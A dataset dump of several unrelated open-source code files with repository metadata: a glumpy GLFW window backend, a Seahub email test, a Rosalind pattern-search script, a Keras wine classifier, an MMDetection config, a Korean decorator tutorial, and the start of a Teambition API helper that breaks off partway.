            # Core profile on macOS additionally requires forward compat.
            glfw.glfwWindowHint(glfw.GLFW_OPENGL_FORWARD_COMPAT, True)
        elif config.major_version >= 3 and config.profile == "compatibility":
            glfw.glfwWindowHint(glfw.GLFW_OPENGL_PROFILE,
                                glfw.GLFW_OPENGL_COMPAT_PROFILE)
        else:
            glfw.glfwWindowHint(glfw.GLFW_OPENGL_PROFILE,
                                glfw.GLFW_OPENGL_ANY_PROFILE)
# ------------------------------------------------------------------ Window ---
class Window(window.Window):
    """GLFW-backed glumpy window.

    Wraps a native GLFW window, installs the GLFW callbacks and re-emits
    them as glumpy window events (on_draw, on_resize, on_key_press, ...).
    """

    def __init__( self, width=512, height=512, title=None, visible=True, aspect=None,
                  decoration=True, fullscreen=False, screen=None, config=None, context=None, color=(0,0,0,1), vsync=False):
        """Create the native window and wire up every GLFW callback.

        Parameters mirror glumpy's generic ``window.Window``; ``vsync``
        toggles buffer-swap synchronization and ``config`` supplies the GL
        context configuration (a default one is built when omitted).
        """
        window.Window.__init__(self, width=width,
                               height=height,
                               title=title,
                               visible=visible,
                               aspect=aspect,
                               decoration=decoration,
                               fullscreen=fullscreen,
                               screen=screen,
                               config=config,
                               context=context,
                               color=color)

        # Whether hidpi is active (retina: framebuffer larger than window)
        self._hidpi = False

        def on_error(error, message):
            log.warning(message)
        glfw.glfwSetErrorCallback(on_error)

        glfw.glfwWindowHint(glfw.GLFW_RESIZABLE, True)
        glfw.glfwWindowHint(glfw.GLFW_DECORATED, True)
        glfw.glfwWindowHint(glfw.GLFW_VISIBLE, True)
        if not decoration:
            glfw.glfwWindowHint(glfw.GLFW_DECORATED, False)
        if not visible:
            glfw.glfwWindowHint(glfw.GLFW_VISIBLE, False)

        if config is None:
            config = configuration.Configuration()
        set_configuration(config)

        monitor = glfw.glfwGetMonitors()[self._screen] if fullscreen else None
        if fullscreen:
            # Fullscreen windows adopt the monitor's current video mode.
            mode = glfw.glfwGetVideoMode(monitor)
            self._width, self._height = mode[:2]

        self._native_window = glfw.glfwCreateWindow(self._width, self._height,
                                                    self._title, monitor, None)

        if not self._native_window:
            log.critical("Window creation failed")
            __exit__()
            sys.exit()

        glfw.glfwMakeContextCurrent(self._native_window)
        glfw.glfwSwapInterval(1 if vsync else 0)

        # OSX: check framebuffer size / window size. On retina display, they
        # can be different so we try to correct window size such as having
        # the framebuffer size of the right size
        w, h = glfw.glfwGetFramebufferSize(self._native_window)
        # BUG FIX: the original compared the `platform` *module* to the
        # string 'darwin' (always False), so this HiDPI correction could
        # never trigger; sys.platform is the intended test.
        if sys.platform == 'darwin' and (w != width or h != height):
            width, height = width // 2, height // 2
            glfw.glfwSetWindowSize(self._native_window, width, height)
            log.info("HiDPI detected, fixing window size")
            self._hidpi = True

        def on_framebuffer_resize(win, width, height):
            self._width, self._height = width, height
            self.dispatch_event('on_resize', width, height)
        glfw.glfwSetFramebufferSizeCallback(self._native_window, on_framebuffer_resize)

        # def on_resize(win, width, height):
        #     self._width, self._height = width, height
        #     self.dispatch_event('on_resize', width, height)
        # glfw.glfwSetWindowSizeCallback(self._native_window, on_resize)

        def on_cursor_enter(win, entered):
            if entered:
                self.dispatch_event('on_enter')
            else:
                self.dispatch_event('on_leave')
        glfw.glfwSetCursorEnterCallback(self._native_window, on_cursor_enter)

        def on_window_close(win):
            self.close()
        glfw.glfwSetWindowCloseCallback(self._native_window, on_window_close)

        def on_keyboard(win, key, scancode, action, mods):
            symbol = self._keyboard_translate(key)
            modifiers = self._modifiers_translate(mods)
            # Key repeats are reported as presses, matching glumpy semantics.
            if action in [glfw.GLFW_PRESS, glfw.GLFW_REPEAT]:
                self.dispatch_event('on_key_press', symbol, modifiers)
            else:
                self.dispatch_event('on_key_release', symbol, modifiers)
        glfw.glfwSetKeyCallback(self._native_window, on_keyboard)

        def on_character(win, character):
            self.dispatch_event('on_character', u"%c" % character)
        glfw.glfwSetCharCallback(self._native_window, on_character)

        def on_mouse_button(win, button, action, mods):
            x, y = glfw.glfwGetCursorPos(win)
            if self._hidpi:
                # Cursor coords are in window units; scale to pixels.
                x, y = 2 * x, 2 * y
            button = __mouse_map__.get(button, window.mouse.UNKNOWN)
            if action == glfw.GLFW_RELEASE:
                self._button = window.mouse.NONE
                self._mouse_x = x
                self._mouse_y = y
                self.dispatch_event('on_mouse_release', x, y, button)
            elif action == glfw.GLFW_PRESS:
                self._button = button
                self._mouse_x = x
                self._mouse_y = y
                self.dispatch_event('on_mouse_press', x, y, button)
        glfw.glfwSetMouseButtonCallback(self._native_window, on_mouse_button)

        def on_mouse_motion(win, x, y):
            if self._hidpi:
                x, y = 2 * x, 2 * y
            dx = x - self._mouse_x
            dy = y - self._mouse_y
            self._mouse_x = x
            self._mouse_y = y
            if self._button != window.mouse.NONE:
                self.dispatch_event('on_mouse_drag', x, y, dx, dy, self._button)
            else:
                self.dispatch_event('on_mouse_motion', x, y, dx, dy)
        glfw.glfwSetCursorPosCallback(self._native_window, on_mouse_motion)

        def on_scroll(win, xoffset, yoffset):
            x, y = glfw.glfwGetCursorPos(win)
            if self._hidpi:
                x, y = 2 * x, 2 * y
            self.dispatch_event('on_mouse_scroll', x, y, xoffset, yoffset)
        glfw.glfwSetScrollCallback(self._native_window, on_scroll)

        self._width, self._height = self.get_size()
        __windows__.append(self)

    def _modifiers_translate(self, modifiers):
        """Convert a GLFW modifier bitmask to glumpy's key-modifier mask."""
        _modifiers = 0
        if modifiers & glfw.GLFW_MOD_SHIFT:
            _modifiers |= window.key.MOD_SHIFT
        if modifiers & glfw.GLFW_MOD_CONTROL:
            _modifiers |= window.key.MOD_CTRL
        if modifiers & glfw.GLFW_MOD_ALT:
            _modifiers |= window.key.MOD_ALT
        if modifiers & glfw.GLFW_MOD_SUPER:
            _modifiers |= window.key.MOD_COMMAND
        self._modifiers = modifiers
        return _modifiers

    def _keyboard_translate(self, code):
        """Map a GLFW key code to glumpy's; printable codes pass through."""
        if (32 <= code <= 96) or code in [161, 162]:
            return code
        return __key_map__.get(code, window.key.UNKNOWN)

    def show(self):
        glfw.glfwShowWindow(self._native_window)
        self.dispatch_event('on_show')

    def hide(self):
        glfw.glfwHideWindow(self._native_window)
        self.dispatch_event('on_hide')

    def close(self):
        """Flag the native window for closing and unschedule its timers."""
        glfw.glfwSetWindowShouldClose(self._native_window, True)
        __windows__.remove(self)
        __windows_to_remove__.append(self)
        for i in range(len(self._timer_stack)):
            handler, interval = self._timer_stack[i]
            self._clock.unschedule(handler)
        self.dispatch_event('on_close')

    def destroy(self):
        glfw.glfwDestroyWindow(self._native_window)

    def get_screen(self):
        return glfw.glfwGetWindowMonitor(self._native_window)

    def set_fullscreen(self, fullscreen, screen=None):
        # NOTE(review): `screen` (an int) is passed where glfwSetWindowMonitor
        # presumably expects a monitor handle -- confirm against the wrapper.
        screen = 0 if screen is None else screen
        mode = glfw.glfwGetVideoMode(glfw.glfwGetMonitors()[screen])
        if fullscreen:
            glfw.glfwSetWindowMonitor(self._native_window, screen, 0, 0, mode[0], mode[1], mode[-1])
        else:
            glfw.glfwSetWindowMonitor(self._native_window, screen, 0, 0, 256, 256, mode[-1])

    def get_fullscreen(self):
        return self._fullscreen

    def set_title(self, title):
        glfw.glfwSetWindowTitle(self._native_window, title)
        self._title = title

    def get_title(self):
        return self._title

    def set_size(self, width, height):
        glfw.glfwSetWindowSize(self._native_window, width, height)
        self._width, self._height = glfw.glfwGetFramebufferSize(self._native_window)

    def get_size(self):
        # Report the framebuffer size (not the window size) so HiDPI
        # rendering gets real pixel dimensions.
        # self._width, self._height = glfw.glfwGetWindowSize(self._native_window)
        self._width, self._height = glfw.glfwGetFramebufferSize(self._native_window)
        return self._width, self._height

    def set_position(self, x, y):
        glfw.glfwSetWindowPos(self._native_window, x, y)
        self._x, self._y = glfw.glfwGetWindowPos(self._native_window)

    def get_position(self):
        self._x, self._y = glfw.glfwGetWindowPos(self._native_window)
        return self._x, self._y

    def swap(self):
        glfw.glfwSwapBuffers(self._native_window)

    def activate(self):
        glfw.glfwMakeContextCurrent(self._native_window)
# ----------------------------------------------------------------- windows ---
def windows():
    """Return the list of currently open backend windows."""
    return __windows__
# ----------------------------------------------------------------- process ---
def process(dt):
    """Run one event-loop iteration over all open windows.

    Polls GLFW events, dispatches on_draw/on_idle on every window, swaps
    buffers, destroys windows scheduled for removal, and returns the number
    of windows still open.
    """
    # Poll for and process events
    glfw.glfwPollEvents()

    # `win` instead of `window`, which shadowed the imported module.
    for win in __windows__:
        # Make window active
        win.activate()
        # Dispatch the main draw event
        win.dispatch_event('on_draw', dt)
        # Dispatch the idle event
        win.dispatch_event('on_idle', dt)
        # Swap buffers
        win.swap()

    # BUG FIX: iterating a list while removing from it skips elements; walk
    # a snapshot so every scheduled window really gets destroyed.
    for win in list(__windows_to_remove__):
        win.destroy()
        __windows_to_remove__.remove(win)

    return len(__windows__)
|
[
"jstreibel@gmail.com"
] |
jstreibel@gmail.com
|
01ed2276aaa8ccf051e68654900f77f99150ae15
|
4de03eecadc4c69caf792f4773571c2f6dbe9d68
|
/tests/seahub/share/views/test_send_shared_link.py
|
c265c943065929d26d603cb4f387bfa7dd71b7aa
|
[
"Apache-2.0"
] |
permissive
|
Tr-1234/seahub
|
c1663dfd12f7584f24c160bcf2a83afdbe63a9e2
|
ed255e0566de054b5570218cb39cc320e99ffa44
|
refs/heads/master
| 2022-12-23T16:20:13.138757
| 2020-10-01T04:13:42
| 2020-10-01T04:13:42
| 300,138,290
| 0
| 0
|
Apache-2.0
| 2020-10-01T04:11:41
| 2020-10-01T04:11:40
| null |
UTF-8
|
Python
| false
| false
| 3,204
|
py
|
from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
    """Tests for the ``send_shared_link`` view's outgoing e-mail headers."""

    def setUp(self):
        # Start every test with an empty outbox.
        mail.outbox = []

    @override_settings(DEFAULT_FROM_EMAIL='from_noreply@seafile.com')
    @patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
    def test_can_send(self):
        # Default configuration: mail is sent from DEFAULT_FROM_EMAIL.
        self.login_as(self.user)

        resp = self.client.post(reverse('send_shared_link'), {
            'email': self.user.email,
            'file_shared_link': 'http://xxx',
            'file_shared_name': 'xxx',
            'file_shared_type': 'd',
            'extra_msg': ''
        }, HTTP_X_REQUESTED_WITH='XMLHttpRequest')

        self.assertEqual(200, resp.status_code)
        self.assertEqual(len(mail.outbox), 1)
        assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
        assert mail.outbox[0].from_email == 'from_noreply@seafile.com'

    @patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
    @patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
    @patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
    @patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
    def test_can_send_from_replyto_rewrite(self):
        # With rewrite enabled, From and Reply-to become the sharer's email.
        self.login_as(self.user)

        resp = self.client.post(reverse('send_shared_link'), {
            'email': self.user.email,
            'file_shared_link': 'http://xxx',
            'file_shared_name': 'xxx',
            'file_shared_type': 'd',
            'extra_msg': ''
        }, HTTP_X_REQUESTED_WITH='XMLHttpRequest')

        self.assertEqual(200, resp.status_code)
        self.assertEqual(len(mail.outbox), 1)
        assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
        assert mail.outbox[0].from_email == self.user.email
        assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email

    @patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
    @patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
    @patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
    @patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
    def test_can_send_from_replyto_rewrite_contact_email(self):
        # A profile contact_email, when set, wins over the login email.
        self.login_as(self.user)

        nickname = 'Testuser'
        contact_email= 'contact_email@test.com'
        p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
        p.contact_email = contact_email
        p.save()
        refresh_cache(self.user.email)

        resp = self.client.post(reverse('send_shared_link'), {
            'email': self.user.email,
            'file_shared_link': 'http://xxx',
            'file_shared_name': 'xxx',
            'file_shared_type': 'd',
            'extra_msg': ''
        }, HTTP_X_REQUESTED_WITH='XMLHttpRequest')

        self.assertEqual(200, resp.status_code)
        self.assertEqual(len(mail.outbox), 1)
        assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
        assert mail.outbox[0].from_email == contact_email
        assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
|
[
"colinsippl@gmx.de"
] |
colinsippl@gmx.de
|
0340fad6844580f9a0ff3797769971efcc2f644a
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Bioinformatics Textbook Track/Chapter 1/rosalind_ba1d.py
|
4e6d4b0953bb2d76fa147c0368a4f8c3ded360aa
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080
| 2020-05-24T18:49:38
| 2020-05-24T18:49:38
| 264,722,651
| 0
| 0
| null | 2020-05-17T17:51:03
| 2020-05-17T17:40:59
| null |
UTF-8
|
Python
| false
| false
| 747
|
py
|
def occurrences(genome, sub):
    """
    Find all 0-based start indexes of (possibly overlapping) occurrences
    of ``sub`` in ``genome``.

    :param genome: genome for processing
    :param sub: pattern for which we find indexes of occurrences
    :return: list of indexes
    """
    start = 0
    indexes = []
    while True:
        start = genome.find(sub, start)
        # str.find returns -1 when no further match exists.  BUG FIX: the
        # original tested ``start > 0``, which silently dropped a match
        # located at index 0.
        if start < 0:
            break
        indexes.append(start)
        # Advance by one so overlapping occurrences are found too.
        start += 1
    return indexes
def read_data_from(file_name):
    """Read a Rosalind input file: pattern on line 1, genome on line 2."""
    handle = open(file_name, "r")
    try:
        pattern = handle.readline().strip()
        genome = handle.readline().strip()
    finally:
        handle.close()
    return genome, pattern
if __name__ == "__main__":
genome, pattern = read_data_from("rosalind_ba1d.txt")
indexes = occurrences(genome, pattern)
for ind in indexes:
print ind,
|
[
"noreply@github.com"
] |
aakibinesar.noreply@github.com
|
f1c755702c61d3a4c3f5e88391da6a3096250b2f
|
5399dd4580ea3f528753bc8b52a981743d62f8bb
|
/keras/keras36_hist3_wine.py
|
6844fef8e2c4a5ad39b62167985de24abdf45314
|
[] |
no_license
|
iwillbeaprogramer/Study
|
3ac7c118ffe3981d78b4ad263cb62432eae13970
|
3bfe571da5bbfc545b994e5878e217f9306bde14
|
refs/heads/main
| 2023-05-07T16:31:05.564973
| 2021-05-27T14:50:00
| 2021-05-27T14:50:00
| 324,044,441
| 8
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
from sklearn.datasets import load_wine
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler,OneHotEncoder
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.callbacks import EarlyStopping
import matplotlib.pyplot as plt

# Wine classification (3 classes, 13 features) with a small dense network.
early_stopping = EarlyStopping(monitor='loss',patience=10)

datasets = load_wine()
x = datasets.data
y = datasets.target
# One-hot encode the integer targets for categorical_crossentropy.
encoder = OneHotEncoder()
y = encoder.fit_transform(y.reshape(-1,1)).toarray()

x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2)
x_train,x_val,y_train,y_val = train_test_split(x_train,y_train,test_size=0.2)

scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
# BUG FIX: fit the scaler on the training split only.  The original called
# fit_transform on test/val too, re-fitting the scaler and leaking their
# statistics into the preprocessing.
x_test = scaler.transform(x_test)
x_val = scaler.transform(x_val)

model = Sequential()
model.add(Dense(128,activation='relu',input_dim=13))
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(3,activation='softmax'))

model.compile(loss = 'categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
# BUG FIX: the EarlyStopping callback was created but never passed to fit().
hist = model.fit(x_train,y_train,validation_data=(x_val,y_val),epochs=300,batch_size=4,callbacks=[early_stopping])
loss = model.evaluate(x_test,y_test,batch_size=4)
y_pred = model.predict(x_test)
print('loss : ',loss[0],'\naccuracy : ',loss[1])

'''
DNN
loss : 3.391478821868077e-05
accuracy : 1.0
'''

# Training curves: loss/accuracy for both train and validation splits.
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('loss & acc')
plt.ylabel('loss, acc')
plt.xlabel('epochs')
plt.legend(['train_loss','val_loss','train_acc','val_acc'])
plt.show()
|
[
"wisixicidi@gmail.com"
] |
wisixicidi@gmail.com
|
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b
|
39e03684081b27311385a0ab31afcc2e09883e5c
|
/configs/reppoints/bbox_r50_grid_center_fpn_1x.py
|
f971b5b7b8c78a6abca727e7015b96d085b5f33b
|
[
"MIT",
"Python-2.0"
] |
permissive
|
witnessai/MMSceneGraph
|
8d0b2011a946ddcced95fbe15445b7f4da818509
|
bc5e0f3385205404c712ae9f702a61a3191da0a1
|
refs/heads/master
| 2023-08-12T06:54:00.551237
| 2021-10-12T03:04:21
| 2021-10-12T03:04:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,462
|
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"23736866+Kenneth-Wong@users.noreply.github.com"
] |
23736866+Kenneth-Wong@users.noreply.github.com
|
a9caebabdf171d0f736e2d36d431084f893a43ac
|
8fa040a06a728ccf8f31e91f39973bb4e98b3122
|
/Python_basic/07_python_decorator.py
|
eb32b59849ccdcdc8dd2bcbecbc16d794c4ab5d2
|
[] |
no_license
|
Souuul/python
|
155ca8efe0b86c97d07863b3e024394217211f01
|
7143dcc35b98d0f1c1fe8c52d0aeb99ee5b42050
|
refs/heads/master
| 2023-01-06T04:37:32.208248
| 2020-11-10T14:24:41
| 2020-11-10T14:24:41
| 283,421,555
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,072
|
py
|
'''
decorator
decorator의 사전적 의미는 장식가, 도배업자
python에서 Decorator는 기존의 코드에 여러가지 기능을 추가하는 python구문이라고 이해하면 편해요!
Closure
first class에 대해서 알아보았어요
first class function(일급함수) : 파이썬은 일급함수를 지원하는 언어
1. 파이썬의 함수는 변수에 저장할 수 있어요!
2. 함수의 인자로 함수를 이용할 수 있어요! > decorator / 프로그램의 확정성 생산성을 높이기 위함
3. 함수의 결과값(리턴값)으로 함수를 이용할 수 있어요! > closure
'''
# # def my_outer_func(func):
# # def my_inner_func():
# # func()
# # return my_inner_func #해당함수 코드를 리턴 // ()해당함수의 실행의 결과를 리턴
# #
# # def my_func():
# # return print("my_func() 함수가 호출되었어요!!")
# #
# # decorated_my_func = my_outer_func(my_func)
# # decorated_my_func() #my_func() 함수가 호출되었어요!!
# # my_func() #my_func() 함수가 호출되었어요!!
#
# import time
#
# def my_outer_func(func): # 목적은 my_func의 기능을 확장시키기 위함!
# def my_inner_func():
# print("{} 함수 수행 시간을 계산합니다.".format(func.__name__))
# start = time.time() # 1970년 1월 1일 0시 0분 0초 0
# func()
# end = time.time()
# print("함수 수행 시간은 {} 계산합니다.".format(start-end))
# return my_inner_func #해당함수 코드를 리턴 // ()해당함수의 실행의 결과를 리턴
#
# # def my_func():
# # return print("my_func() 함수가 호출되었어요!!")
#
# # decorated_my_func = my_outer_func(my_func)
# # decorated_my_func() #my_func() 함수가 호출되었어요!! // 함수자체의 기능을 수정하지 않고 함수의 기능을 수정할 수 있
# # my_func() #my_func() 함수가 호출되었어요!!
#
# # closure vs decorator // 새로운 기능 추가되는 것을 리턴하는것
#
# @my_outer_func # decorator 기능을 추가한 my_func를 리턴
# def my_func():
# return print("my_func() 함수가 호출되었어요!!")
#
#
# my_func()
# '''
# my_func 함수 수행 시간을 계산합니다.
# my_func() 함수가 호출되었어요!!
# 함수 수행 시간은 -5.7220458984375e-06 계산합니다.
# '''
#############################################################
# def print_user_name(*args): # 인자로 들어온 사람의 이름을 출력 / 정해지지 않는
# # args는 tuple로 받아요!
# for name in args:
# print(name)
# print_user_name("홍길동", "신사임당") #이렇게도 가능
# print_user_name("홍길동", "신사임당", "유관순") #이렇게도 가능
'''
홍길동
신사임당
홍길동
신사임당
유관순
'''
# def print_user_name(**kwargs): # 관용적으로 **kwargs 표기
# # kkargs는 dict로 받아요!
# for name in kwargs.values(): # key, value로 구분
# #print(kwargs.get(name)) # get 을 통해서 추출가능
# print(name)
# print_user_name(name1 = "홍길동", name2= "신사임당") #이렇게도 가능
## 받는 함수의 인자의 개수가 다를경우
# def my_outer(func):
# def my_inner(*args, **kwargs): # decorator의 인자의 개수를 예측하기 힘들기에 *args, **kwargs 를 적용하여 인자문제 해결
# print("데코레이터!! 시작")
# func(*args, **kwargs) # *args, **kwargs
# print("데코레이터!! 끝")
#
# return my_inner
#
# @my_outer
# def my_func():
# print("이것은 소리없는 아우성!!")
# @my_outer
# def my_add(x,y):
# print("두 수의 합은 : {}".format(x+y))
#
#
# my_func()
# '''
# 데코레이터!! 시작
# 이것은 소리없는 아우성!!
# 데코레이터!! 끝
# '''
#
# my_add(1,2)
#
# '''
# 데코레이터!! 시작
# 두 수의 합은 : 3
# 데코레이터!! 끝
# '''
# 블로그!!
## 티스토리추천
##http://moon9342.github.io
|
[
"hans53400@naver.com"
] |
hans53400@naver.com
|
56949c4db28de69646a0608078ccaa2021987d61
|
4de645802568e0317654e75afbe6d79db69317e5
|
/pythonx/snippet_helpers.py
|
53c12d4bac09f6abed674f1b50d73b5819df9624
|
[] |
no_license
|
liiil825/dotvim
|
25da0b499f0b94c69d26336d9917e3019e4c8262
|
40dea6d8970b02a8d141909207ff72bb1e9723c8
|
refs/heads/master
| 2023-04-05T22:31:48.199682
| 2023-03-29T08:39:04
| 2023-03-29T08:39:04
| 34,794,542
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
def fraction( a, b ):
try:
return "%.1f" % ( float( a ) / float( b ) )
except ( ValueError, ZeroDivisionError ):
return "ERR"
|
[
"40129878@qq.com"
] |
40129878@qq.com
|
152edf169d78c30351a491fd1d68dccb08de71c1
|
a9ee8b29cc753cbcf3167e2741c779ad43ab22a3
|
/api/wsgi.py
|
6a23d3e1ea9a1a6b3e64ad17e9afb8029d5cf9b3
|
[
"MIT"
] |
permissive
|
josecolinapy/fifa-21-api
|
f76f06679be9f696f03ce0f3e6e5be5fc5c4c0f4
|
5ed75b60a8c302ad7d4fde04a07312de18c10b1e
|
refs/heads/main
| 2023-03-18T17:03:31.483890
| 2021-03-14T15:04:56
| 2021-03-14T15:04:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
"""
WSGI config for api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings.settings')
application = get_wsgi_application()
|
[
"othmaane59100@live.fr"
] |
othmaane59100@live.fr
|
e54bf365ae9ed61261b9902b687769361a488445
|
dfbc64250dfdecbf70377b6cf6549e04521795ec
|
/codingALGO/test_solve.py
|
02d9f40f03d44be312992c89f5619a2bc3a41fa2
|
[] |
no_license
|
sagarrshd/mm
|
60a939d09cc0cef3ce191a3e3b7d387fbcbbcca5
|
7fb9287c567507a5e6a05b6367bc21b15d03d984
|
refs/heads/master
| 2023-04-18T10:11:28.492485
| 2021-05-01T19:14:15
| 2021-05-01T19:14:15
| 363,487,969
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
import pytest
from solve import count_sum_lists
def test1():
A = [1, 2, 8]
k = 1000
B = 2
res = count_sum_lists(A, k, B)
assert res == 3
def test2():
A = [5, 17, 10000, 11]
k = 1000
B = 4
res = count_sum_lists(A, k, B)
assert res == 0
|
[
"sagarrshd@gmail.com"
] |
sagarrshd@gmail.com
|
ae1a109105467ef139d1001e81abe371486a106d
|
15e0928f1fad3c4a21823bdce4bc4e76d3d2801a
|
/teambitionHelp.py
|
1fe4180389083c096e89e89d77983d59e77ec661
|
[] |
no_license
|
HuangJT/teambitionApi
|
a610b70ffa1492804f9b63afe57c844ceb7ece70
|
12494bba65246f1e548792bc3a02b87e05f59a81
|
refs/heads/master
| 2022-07-05T21:59:55.998780
| 2020-05-11T02:43:58
| 2020-05-11T02:43:58
| 262,920,368
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,090
|
py
|
# -*- coding: UTF-8 -*-
import requests
import json
import pymysql
from pymysql import cursors
import time
import urllib
import codecs
from datetime import datetime, date, timedelta
# pip install PyJWT
import jwt
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
from settings import SETTINGS
class TeambitionHelp:
__tbAppId = "" # api token
__tbSecrect = ""
__accessToken = ""
def __init__(self):
self.__tbAppId = SETTINGS["TB_APP_ID"]
self.__tbSecrect = SETTINGS["TB_APP_SECRECT"]
expire_time = int(time.time() + 3600) # 1 小时后超时
encoded = jwt.encode({'_appId': self.__tbAppId, 'exp': expire_time}, self.__tbSecrect, algorithm='HS256')
# print(encoded)
encoded_str = str(encoded, encoding='utf-8')
# print(encoded_str)
self.__accessToken = encoded_str
def __getAuthHeaders(self):
return {'Authorization': 'Bearer '+ self.__accessToken,'X-Tenant-Id':SETTINGS['TB_ORG_ID'],'X-Tenant-Type':'organization'}
def logf(self,content):
logContent = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + " " + content + "\n"
logFile = codecs.open(SETTINGS['LOG_FILE'], 'a', encoding='utf-8')
